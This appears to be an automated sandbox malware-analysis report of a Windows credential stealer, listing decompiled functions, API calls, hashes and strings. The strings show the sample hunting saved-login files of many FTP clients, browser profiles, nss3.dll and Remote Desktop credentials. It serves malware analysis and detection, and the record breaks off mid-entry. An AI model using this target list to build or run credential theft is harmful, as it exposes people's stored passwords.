                                                • Opcode ID: 0dc8a9e704d732632ae677e2a4eeb85f90688fa455183c1d35bdcec236b17009
                                                • Instruction ID: 41b9c1d827694c45b055be9885e390ab78c4181ca929fd9b4fad9bc2efccc836
                                                • Opcode Fuzzy Hash: 0dc8a9e704d732632ae677e2a4eeb85f90688fa455183c1d35bdcec236b17009
                                                • Instruction Fuzzy Hash: 2E214271D44208FEEF116BA1CC46F9E7F76EF04314F20456AB110B91E1D7B95A90DB68
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,UltraFXP), ref: 00406A8A
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                  • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                  • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: lstrlen$FreeLocallstrcatlstrcpy
                                                • String ID: 8Ap$UltraFXP$XDp$\sites.xml
                                                • API String ID: 3221862373-444401445
                                                • Opcode ID: 3ee557d8948749a9f363e05ac3ab561d7af12fe1c0779f2872b34504749073ba
                                                • Instruction ID: fe50e8412d5de4826f8aa5028d62146759da49d9ede5e75c6998d87ff6d2b012
                                                • Opcode Fuzzy Hash: 3ee557d8948749a9f363e05ac3ab561d7af12fe1c0779f2872b34504749073ba
                                                • Instruction Fuzzy Hash: CB01F270600105BADB1277258C02F9B3E59DB82324F24813BB951B21E3D77C4EA296AC
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,DeluxeFTP), ref: 0040B071
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$DeluxeFTP$XDp$sites.xml
                                                • API String ID: 1884169789-17931946
                                                • Opcode ID: b791a2c04080efa2ee5c3c4b65acfa7ed633b008d2bb8f4cfed1c2e7b6693c2e
                                                • Instruction ID: f3e3bf22580bc8462cbc14a14de12222ca0203319865bdfe03756184609a4090
                                                • Opcode Fuzzy Hash: b791a2c04080efa2ee5c3c4b65acfa7ed633b008d2bb8f4cfed1c2e7b6693c2e
                                                • Instruction Fuzzy Hash: 3F01F970500105BADB2177358C01F9F7E59DB81354F24413BB964B51E2D77C9E8293DC
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,FastStone Browser), ref: 0040E07D
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$FTPList.db$FastStone Browser$XDp
                                                • API String ID: 1884169789-1527714265
                                                • Opcode ID: 4695791087d13fab206f330d85effeb0877b2d61392cc71d6ea480aa4e0e76d8
                                                • Instruction ID: 8b7ad658e0f9898fae75c5c852b5ba092d96d59e02dd99aacdff7b292d3b8023
                                                • Opcode Fuzzy Hash: 4695791087d13fab206f330d85effeb0877b2d61392cc71d6ea480aa4e0e76d8
                                                • Instruction Fuzzy Hash: 0801F930500115BAEB217736CC01F9B7F95DB82354F28453BB850711E2E7BC8E9293AC
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,My FTP), ref: 0040E516
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$My FTP$XDp$project.ini
                                                • API String ID: 1884169789-4144297628
                                                • Opcode ID: 8053ae7c130db41f9b11dd27f96358f3d4422c72d1528fa28ec15a84cf9d7be8
                                                • Instruction ID: dc2e5743d3051a8b2d431c239bfacc6a075ff92f77e2013cd18376d7b0eadfc4
                                                • Opcode Fuzzy Hash: 8053ae7c130db41f9b11dd27f96358f3d4422c72d1528fa28ec15a84cf9d7be8
                                                • Instruction Fuzzy Hash: 0E01D670504115BADB1177668C01F9B7F59DB81318F240D3BB950B11E2F77C9E92929C
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,WinFTP), ref: 0040A172
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$Favorites.dat$WinFTP$XDp
                                                • API String ID: 1884169789-613684079
                                                • Opcode ID: 6d07a4fa71da6e0b55c39a300303122fc8201443dc3c12620699a64e37237601
                                                • Instruction ID: cd2585765ada306bdb4c6f471fa67e0287bcc736790fbbdd257811b3a2605063
                                                • Opcode Fuzzy Hash: 6d07a4fa71da6e0b55c39a300303122fc8201443dc3c12620699a64e37237601
                                                • Instruction Fuzzy Hash: 3701F470600205BADB2277259C01F9B7F55DB82364F28413BB851B92E2D77C8E92D3ED
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,FastTrack), ref: 0040F934
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$FastTrack$XDp$ftplist.txt
                                                • API String ID: 1884169789-2599595899
                                                • Opcode ID: 55ea187d0cb8c00720327f23aadaf3edc8abbeb004095c79273b3437fdac17a2
                                                • Instruction ID: 396507b48aabb71f267d08f879d847fba005e25ea80404fc12cd3c9f9e346ce3
                                                • Opcode Fuzzy Hash: 55ea187d0cb8c00720327f23aadaf3edc8abbeb004095c79273b3437fdac17a2
                                                • Instruction Fuzzy Hash: 3201D670504106BADB2276358C01F9B7E55DB81754F24013BB850B16E2D7795E9293EC
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,FTPShell), ref: 0040DF12
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$FTPShell$XDp$ftpshell.fsi
                                                • API String ID: 1884169789-3163282236
                                                • Opcode ID: dd6416760811fc27447f527697605dcedefa14434bc917533f565477c277f8de
                                                • Instruction ID: 0223982157bc78e7f7b3c8b5b80daeb52112694ad693ea29ceadf3c1998cbfb9
                                                • Opcode Fuzzy Hash: dd6416760811fc27447f527697605dcedefa14434bc917533f565477c277f8de
                                                • Instruction Fuzzy Hash: 87014930904106BADB1177618C01F9B3F55DB82354F24813BB951711E2D77C9E82839C
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,NexusFile), ref: 0040DFFF
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$NexusFile$XDp$ftpsite.ini
                                                • API String ID: 1884169789-3304524516
                                                • Opcode ID: 43e960bb37f8414185b25a92b9ef3f0877c102d1eda73c9185fc0001e6eb0650
                                                • Instruction ID: 0f716640b70d201f2f329b02194ae8b07a4dd60e68bb1147a4a4e66ade58e48c
                                                • Opcode Fuzzy Hash: 43e960bb37f8414185b25a92b9ef3f0877c102d1eda73c9185fc0001e6eb0650
                                                • Instruction Fuzzy Hash: EF01D170500115BADB216A26CC01F9E7F99DB82364F24453BB950B12E2E7B89E9297AC
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,?,?,0000001B), ref: 004083EB
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040840C
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: ByteCharMultiWide$FreeLocal
                                                • String ID: ]A$]A
                                                • API String ID: 2558778219-3231057216
                                                • Opcode ID: 404b6c1429344f1c5127e9c70ee5f01d18d8d11957ac5a1ad8030549458bd8a6
                                                • Instruction ID: b5c686e66aa75bb0ea5c3a45f9d24023e4dde9a45453e9509f1690b0b28c1787
                                                • Opcode Fuzzy Hash: 404b6c1429344f1c5127e9c70ee5f01d18d8d11957ac5a1ad8030549458bd8a6
                                                • Instruction Fuzzy Hash: 6F518F72A00219AFEF10AE65EC45BDF7BA5FB80314F00843AF950B72D1DBB99D10DA58
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5A7
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5C9
                                                • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C5DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$OpenStorage
                                                • String ID: Settings
                                                • API String ID: 2489594185-473154195
                                                • Opcode ID: d8e2c43f552cd5be9f122384b3bed41607f0a0515e63b31b02fc0204f5f899cf
                                                • Instruction ID: 45371d5192e4b28a761186b6385347240049983ed8c7a30cfb32e2f7b06d0ba5
                                                • Opcode Fuzzy Hash: d8e2c43f552cd5be9f122384b3bed41607f0a0515e63b31b02fc0204f5f899cf
                                                • Instruction Fuzzy Hash: E431CC31A4010AFBEF11AFA1CC42F9EBB76BF04704F208676B611791F1D7759A50AB58
                                                APIs
                                                • GetHGlobalFromStream.OLE32(?,?), ref: 004017E5
                                                • GlobalLock.KERNEL32(?), ref: 00401800
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • GlobalUnlock.KERNEL32(?), ref: 0040185E
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040186D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$Local$AllocFreeFromLockStreamUnlock
                                                • String ID: PKDFILE0YUICRYPTED0YUI1.0
                                                • API String ID: 1329788818-258907703
                                                • Opcode ID: 56b21bb33aac6a82660614896146e3409b500c85d2ae59914b4ff5d62cb87d5a
                                                • Instruction ID: ebbbe2b59391e3aaee2ab6b6a4edf92b2b65332d5e813d2d7ef502307b157ca4
                                                • Opcode Fuzzy Hash: 56b21bb33aac6a82660614896146e3409b500c85d2ae59914b4ff5d62cb87d5a
                                                • Instruction Fuzzy Hash: E921EC72D00109BBEF017FE1CC42AAD7E76EF10344F10807ABA10751B1E77A9A609B98
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: http://$https://
                                                • API String ID: 0-1916535328
                                                • Opcode ID: f80222c2be3f39736afa5bdbc870f2f4b69eab5c1b9cd07a085db7d06d61aa49
                                                • Instruction ID: 36914738dcc24f5284e4ebbc1b9eef358293ae7963248e41ec2cf401613fd4ce
                                                • Opcode Fuzzy Hash: f80222c2be3f39736afa5bdbc870f2f4b69eab5c1b9cd07a085db7d06d61aa49
                                                • Instruction Fuzzy Hash: 6C411931800109FADF12AF91CE05BDE7BB6AF40358F10853AB551791F1CB7A4B90EB99
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00401AF6
                                                • GetHGlobalFromStream.OLE32(?,?), ref: 00401B0F
                                                • GlobalLock.KERNEL32(?), ref: 00401B2A
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • GlobalUnlock.KERNEL32(?), ref: 00401B52
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
                                                • String ID:
                                                • API String ID: 1884134869-0
                                                • Opcode ID: a6e021ce18fff2a2ec2b37efbbfb5ce86c0a90fa50629b721e29d811f84a25f4
                                                • Instruction ID: 621e9e9be75d07b42097c487be39cb2d33a31aa4828135fb6f0f97c2ff2c831f
                                                • Opcode Fuzzy Hash: a6e021ce18fff2a2ec2b37efbbfb5ce86c0a90fa50629b721e29d811f84a25f4
                                                • Instruction Fuzzy Hash: 21219875D0010CBEDF01AFA1DC429DDBB7AAF04344F0040B6BA15B51B1DB799BA5AB98
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,K-Meleon), ref: 0040C3D6
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocallstrcatlstrcpy
                                                • String ID: 8Ap$K-Meleon$\Profiles
                                                • API String ID: 3221862373-1593404455
                                                • Opcode ID: a858e8d3e49293d64023f48dbd86bfc66e191896084e83ba2a9a4783122f8104
                                                • Instruction ID: 4873897dde30dd4dbf8587ad023f8bffba789afd884ab7b067c2024aa4535c65
                                                • Opcode Fuzzy Hash: a858e8d3e49293d64023f48dbd86bfc66e191896084e83ba2a9a4783122f8104
                                                • Instruction Fuzzy Hash: 26118F30540108FADF222BA1CC42EAD7E66AF55344F14423AB904741F2D7798A91A758
                                                APIs
                                                  • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                                                • StrStrIA.SHLWAPI(?,0041679F), ref: 0040CC68
                                                • lstrlen.KERNEL32(TERMSRV/,?,0041679F), ref: 0040CC76
                                                • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,0041679F), ref: 0040CC86
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: TERMSRV/
                                                • API String ID: 1659193697-3001602198
                                                • Opcode ID: 973b5681ba22234737b84a6ea26a33df1634edba24d759306a1e8466351013e8
                                                • Instruction ID: 0e33322fa43a7393c9c901e98c28ddf77560ff6a40d7ebd916c261fa5b4e0482
                                                • Opcode Fuzzy Hash: 973b5681ba22234737b84a6ea26a33df1634edba24d759306a1e8466351013e8
                                                • Instruction Fuzzy Hash: B011A835410109FFDF026F61CD428DD3E62AF44398F104536B929791F1DB7A8AB1AB98
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,FreshFTP), ref: 0040C7D2
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: .SMF$8Ap$FreshFTP
                                                • API String ID: 1884169789-3664833108
                                                • Opcode ID: 454fa819fdd3e24f95ce041dd73a3575ccba9cef9d95e204f9cd3b60f17f143f
                                                • Instruction ID: 477fad2c5324d79bae27c71323b2f58287a32a148f67e115926fd6e1bf06e8da
                                                • Opcode Fuzzy Hash: 454fa819fdd3e24f95ce041dd73a3575ccba9cef9d95e204f9cd3b60f17f143f
                                                • Instruction Fuzzy Hash: 6AF0F431900105FADF223B65CC41FAE7FA19B81744F24423AB410711E2E7B98A91D75C
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,Staff-FTP), ref: 0040C53D
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$Staff-FTP$sites.ini
                                                • API String ID: 1884169789-1193396973
                                                • Opcode ID: 1e29051f39b9b98068a91518eade9c9277cbd39c9ed21cf938d3e73f03a9e06c
                                                • Instruction ID: 86c97d9f4ce5bd779839c9a6a5c351d92fa3fa347d4bfa9cfc32d2e10e445be4
                                                • Opcode Fuzzy Hash: 1e29051f39b9b98068a91518eade9c9277cbd39c9ed21cf938d3e73f03a9e06c
                                                • Instruction Fuzzy Hash: B6F0F674500101B5DB217735DC42F6F3E999B81794F14033AB410B11E6EBBC9F81D29C
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,GoFTP), ref: 0040CA0F
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$Connections.txt$GoFTP
                                                • API String ID: 1884169789-2081745633
                                                • Opcode ID: 3f66269d1b3452a2299dea9a804d1b5a09767ab400e56e2bff911dd811526a0c
                                                • Instruction ID: bfa60bb2ce1f4916441e22987b850a7f4e4a5f93a4d34056f73a81fc435db6d2
                                                • Opcode Fuzzy Hash: 3f66269d1b3452a2299dea9a804d1b5a09767ab400e56e2bff911dd811526a0c
                                                • Instruction Fuzzy Hash: 44F0F670600105B6DB21B7758C42FAF3E559B81354F24433AB810B11E2E7BC8E9196AC
                                                APIs
                                                • lstrlen.KERNEL32(?), ref: 00409074
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409095
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectorylstrlen
                                                • String ID: nss3.dll
                                                • API String ID: 2713697268-2492180550
                                                • Opcode ID: 120aac01b1d19bf89567df46df9f15ac37a0c958acc84ce813f69d2bc8fe1057
                                                • Instruction ID: 79ef5b793eaa19e43d16629d1b832ed7db9b7e222fb3f2d26c77b95c4dd7ac76
                                                • Opcode Fuzzy Hash: 120aac01b1d19bf89567df46df9f15ac37a0c958acc84ce813f69d2bc8fe1057
                                                • Instruction Fuzzy Hash: E811A170602101EFDB106F68EE8E7C93FB1BB84385F01C436E111A92E2E7B9CC918A4D
                                                APIs
                                                • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD19
                                                • CredFree.ADVAPI32(00000000), ref: 0040CD60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
